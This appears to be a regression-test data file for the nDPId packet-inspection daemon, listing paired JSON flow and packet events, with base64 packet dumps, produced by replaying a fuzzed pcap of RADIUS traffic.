00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998285403,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998285403,"flow_last_seen":1528998285403,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998285403,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"14.12.64.30","src_port":3860,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1528998285403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998285403,"pkt":"ABRP+4rqcNuYVcUnCABFAAClDBBAAPwRR\/bG4hk1DgxAHg8UchAAkVlTC5wAid6Vm2Prh8ff1igjujrPQY0BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWPjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmELODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEvWoCrn3KdnMpOYKRlABwJ8="} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1528998285403,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998285403,"pkt":"ABRP+4rqcNuYVcUnCABFAAClDBBAAPwRR\/bG4hk1DgxAHg8UchAAkVlTC5wAid6Vm2Prh8ff1igjujrPQY0BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWPjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmELODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5Tw4BAAAMFwwAAAwBf\/xQEvWoCrn3KdnMpOYKRlABwJ8="}
00576{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998285529,"pkt":"ABRP+4rqcNuYVcUnCABFAADADBdAEPwRR9TG4hlFCgxAHgcUchAArDMCA50ApI8fGqCVnysbmexp5ciWlfwBJTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5EiIzMjc2NCBTqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998285529,"pkt":"ABRP+4rqcNuYVcUnCABFAADADBdAEPwRR9TG4hlFCgxAHgcUchAArDMCA50ApI8fGqCVnysbmexp5ciWlfwBJTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5ODcvNWM6MWQ6ZDk6NTM6MGM6OWIvMjM5EiIzMjc2NCBTqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998285592} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":293,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998285592}
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1528998307737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998307737,"pkt":"ABRP+4rqcNuYVcUnCABFAADhDH5AAPsRSEzGBwk1CgxAHgcUchAAzRApC54AxbiGAVeQd4nw9IQcbiUA5zoBNTAzMTM0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3T0oBAnZIFwEAAAEFAAD4l2tdy6yk\/88l9cpE8l40DAUAACRoRug2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1528998307737,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998307737,"pkt":"ABRP+4rqcNuYVcUnCABFAADhDH5AAPsRSEzGBwk1CgxAHgcUchAAzRApC54AxbiGAVeQd4nw9IQcbiUA5zoBNTAzMTM0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3T0oBAnZIFwEAAAEFAAD4l2tdy6yk\/88l9cpE8l40DAUAACRoRug2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":295,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998307737,"flow_last_seen":1528998307737,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998307737,"l3_proto":"ip4","src_ip":"198.7.9.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1528998308061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998308061,"pkt":"AAAMB3BAABRP+4rqCABFAALHIU9AAP8RAAAKDEAexuIZNXIwBxRDswAAAZ8Cq9PofZmSNOhQyNOgaRsyJ1QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNYUjEwGgkAADghDQMwNxZbIqmjATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b243aUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkczEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6JQA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDhFRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADqGOBIENmf79hbM4GZs1ZYAwIAIJdiOR0aFAC4V8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhBhAFfICwpUZXN0IExhYhoJAABXyA8DMRoKpwBXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaHJlY3QaDAAABYNHBsBQSplQEuURqTNatQDGcJFc00xUIbY="} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1528998308061,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998308061,"pkt":"AAAMB3BAABRP+4rqCABFAALHIU9AAP8RAAAKDEAexuIZNXIwBxRDswAAAZ8Cq9PofZmSNOhQyNOgaRsyJ1QaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNYUjEwGgkAADghDQMwNxZbIqmjATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b243aUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkczEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6JQA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDhFRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADqGOBIENmf79hbM4GZs1ZYAwIAIJdiOR0aFAC4V8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhBhAFfICwpUZXN0IExhYhoJAABXyA8DMRoKpwBXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaHJlY3QaDAAABYNHBsBQSplQEuURqTNatQDGcJFc00xUIbY="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":296,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998308061,"flow_last_seen":1528998308061,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998308061,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29232,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00727{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":16640,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"ABRP+4rqcNu2VcUnQQBFAAEwDINAAPsRR\/jG4hk1CgwlAAcUchABHKZIAp8BFMKP3L7bmNggOPWkTIavpgoaCwAAV8gbBVNQQxpuAAABNxA0723Z5fHoC0l+gadvadgzfaSzCz27rPwxopk71TEDK1VIm8mW\/vsFxUsHy2TxysAjZO8RNM3E07NOswLZR1Yjduj2RuApthb0mlkqWQZZpjfg4Vd1eYt2TqpojJTwm8thaNHCskFYATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLiUAYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhOTUyL2YwOjc5OlAwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFeVBDTwYDAgAEUBIoTJCJ2HxVvdUlAOn56UH9"} 00713{"packet_event_id":1,"packet_event_name":"packet","packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":16640,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"ABRP+4rqcNu2VcUnQQBFAAEwDINAAPsRR\/jG4hk1CgwlAAcUchABHKZIAp8BFMKP3L7bmNggOPWkTIavpgoaCwAAV8gbBVNQQxpuAAABNxA0723Z5fHoC0l+gadvadgzfaSzCz27rPwxopk71TEDK1VIm8mW\/vsFxUsHy2TxysAjZO8RNM3E07NOswLZR1Yjduj2RuApthb0mlkqWQZZpjfg4Vd1eYt2TqpojJTwm8thaNHCskFYATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLiUAYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhOTUyL2YwOjc5OlAwOmQxOjdkOjM3LzIzN1kMOTA4NDIxMzI5MhIJU3VjY2VzcxkFeVBDTwYDAgAEUBIoTJCJ2HxVvdUlAOn56UH9"}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":16640,"global_ts_msec":1528998308249} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":297,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":16640,"global_ts_msec":1528998308249}
01298{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"AAAMB6xAABRP+4rqCAAkAALbIVBAAP8RAAAKDEAexuIZNXIQBxQCxwAAAaACv\/i0glgkXqR4abyMOyu1FuUaCgAAV8gOBFVTGgwAAFfIDSUAaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqmkATUwMzExNDgwNDMyNjA4NTg2QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpLi1zZXNzaW9uLWl0PTEwZmYxMGFjMDAwMDAwZDFhNGE5MjI1YiwgNWIyMmE5YTQvNWM6MWQ6ZDE6NTM6MGM6OWIvMjQwBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABFABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODA0MzJoMDg1ODbWd2xhbi5tbkM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhdWQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZCUAbURpcmVjdBoMAAAFgwdbwFBKmVAS3DaqxzVlY8YVdJMYTWA\/Jw=="} 01284{"packet_event_id":1,"packet_event_name":"packet","packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998308061,"pkt":"AAAMB6xAABRP+4rqCAAkAALbIVBAAP8RAAAKDEAexuIZNXIQBxQCxwAAAaACv\/i0glgkXqR4abyMOyu1FuUaCgAAV8gOBFVTGgwAAFfIDSUAaWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqmkATUwMzExNDgwNDMyNjA4NTg2QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TNWMtMWQtZDktNTMtMGMtOWIeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpLi1zZXNzaW9uLWl0PTEwZmYxMGFjMDAwMDAwZDFhNGE5MjI1YiwgNWIyMmE5YTQvNWM6MWQ6ZDE6NTM6MGM6OWIvMjQwBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABFABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODA0MzJoMDg1ODbWd2xhbi5tbkM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhdWQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZCUAbURpcmVjdBoMAAAFgwdbwFBKmVAS3DaqxzVlY8YVdJMYTWA\/Jw=="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998308483} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":298,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998308483}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1528998314309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998314309,"pkt":"ABRP+4pIcNuYVcUnCABFAAClDKJAAPwRR2TG4hk1ClFAHgcUchAAkVZiC6QAiXXtUkUY2UEpsUhCUrecX98BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6NTM6MGM6OWIvMjQwTw4BAAAMFwwAAAwBf\/xQEi8FyNCyWjoJnDm8uRInVVc="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1528998314309,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998314309,"pkt":"ABRP+4pIcNuYVcUnCABFAAClDKJAAPwRR2TG4hk1ClFAHgcUchAAkVZiC6QAiXXtUkUY2UEpsUhCUrecX98BNTAzMTE0ODA0MzI2MDg1ODZAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5YTQvNWM6MWQ6ZDk6NTM6MGM6OWIvMjQwTw4BAAAMFwwAAAwBf\/xQEi8FyNCyWjoJnDm8uRInVVc="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998314309,"flow_last_seen":1528998314309,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998314309,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.81.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
